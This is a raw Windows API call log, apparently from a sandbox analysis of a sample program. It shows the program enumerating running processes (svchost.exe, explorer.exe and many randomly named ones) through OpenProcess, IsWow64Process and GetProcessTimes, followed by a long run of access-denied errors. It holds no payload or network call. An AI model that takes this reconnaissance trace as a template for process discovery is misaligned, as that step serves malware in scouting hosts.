	[0084.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0084.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x76c8e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0084.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0084.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0084.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0084.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e9f8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0084.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0084.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0084.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0084.964] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x6a0
	[0084.965] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.965] CloseHandle (hObject=0x6a0) returned 1
	[0084.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x397ea88, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0084.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0084.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x396ea50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x6a0
	[0084.965] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.965] CloseHandle (hObject=0x6a0) returned 1
	[0084.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x396ea50, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0084.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0084.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397eab8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x6a0
	[0084.966] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.966] CloseHandle (hObject=0x6a0) returned 1
	[0084.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x6a0
	[0084.966] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.966] CloseHandle (hObject=0x6a0) returned 1
	[0084.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x397e9b0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x6a0
	[0084.966] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.966] CloseHandle (hObject=0x6a0) returned 1
	[0084.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397ea88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x6a0
	[0084.967] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.967] CloseHandle (hObject=0x6a0) returned 1
	[0084.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x6a0
	[0084.967] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.967] CloseHandle (hObject=0x6a0) returned 1
	[0084.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x397e8c0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.967] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x6a0
	[0084.967] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.967] CloseHandle (hObject=0x6a0) returned 1
	[0084.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0084.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x6a0
	[0084.968] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.968] CloseHandle (hObject=0x6a0) returned 1
	[0084.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x6a0
	[0084.968] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.968] CloseHandle (hObject=0x6a0) returned 1
	[0084.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x397e8c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x6a0
	[0084.968] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.968] CloseHandle (hObject=0x6a0) returned 1
	[0084.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x396eb30, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0084.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x397e9f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x6a0
	[0084.969] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.969] CloseHandle (hObject=0x6a0) returned 1
	[0084.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x396eab0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x6a0
	[0084.969] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.969] CloseHandle (hObject=0x6a0) returned 1
	[0084.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x76c8f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0084.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x6a0
	[0084.969] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.969] CloseHandle (hObject=0x6a0) returned 1
	[0084.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x396e770, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0084.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x6a0
	[0084.970] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.970] CloseHandle (hObject=0x6a0) returned 1
	[0084.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39a19c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0084.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x6a0
	[0084.970] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.970] CloseHandle (hObject=0x6a0) returned 1
	[0084.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x6a0
	[0084.970] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.970] CloseHandle (hObject=0x6a0) returned 1
	[0084.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x397ea88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0084.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x6a0
	[0084.971] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.971] CloseHandle (hObject=0x6a0) returned 1
	[0084.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x397ea88, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0084.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x6a0
	[0084.971] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.971] CloseHandle (hObject=0x6a0) returned 1
	[0084.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x396e750, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0084.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x6a0
	[0084.971] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.971] CloseHandle (hObject=0x6a0) returned 1
	[0084.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x396ea50, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0084.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x6a0
	[0084.971] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.971] CloseHandle (hObject=0x6a0) returned 1
	[0084.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x397e9b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x6a0
	[0084.972] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.972] CloseHandle (hObject=0x6a0) returned 1
	[0084.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x397e9b0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0084.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x6a0
	[0084.972] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.972] CloseHandle (hObject=0x6a0) returned 1
	[0084.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39a1880, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0084.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x6a0
	[0084.972] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.972] CloseHandle (hObject=0x6a0) returned 1
	[0084.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x397eab8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x6a0
	[0084.973] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.973] CloseHandle (hObject=0x6a0) returned 1
	[0084.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x397e8c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0084.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x6a0
	[0084.973] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.973] CloseHandle (hObject=0x6a0) returned 1
	[0084.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x396eb30, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0084.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x6a0
	[0084.973] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.973] CloseHandle (hObject=0x6a0) returned 1
	[0084.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x397e8c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0084.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x6a0
	[0084.973] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.973] CloseHandle (hObject=0x6a0) returned 1
	[0084.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x396ea50, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0084.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x6a0
	[0084.974] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.974] CloseHandle (hObject=0x6a0) returned 1
	[0084.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39a1b28, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0084.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x6a0
	[0084.974] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.974] CloseHandle (hObject=0x6a0) returned 1
	[0084.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39a1b78, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0084.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0084.975] IsWow64Process (in: hProcess=0x6a0, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0084.975] CloseHandle (hObject=0x6a0) returned 1
	[0084.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x397e9b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0084.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x6a0
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.975] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetLastError () returned 0x5
	[0084.976] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0084.976] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0084.976] GetProcessTimes (in: hProcess=0x6a0, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0084.976] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
	[0084.977] GetLastError () returned 0x5
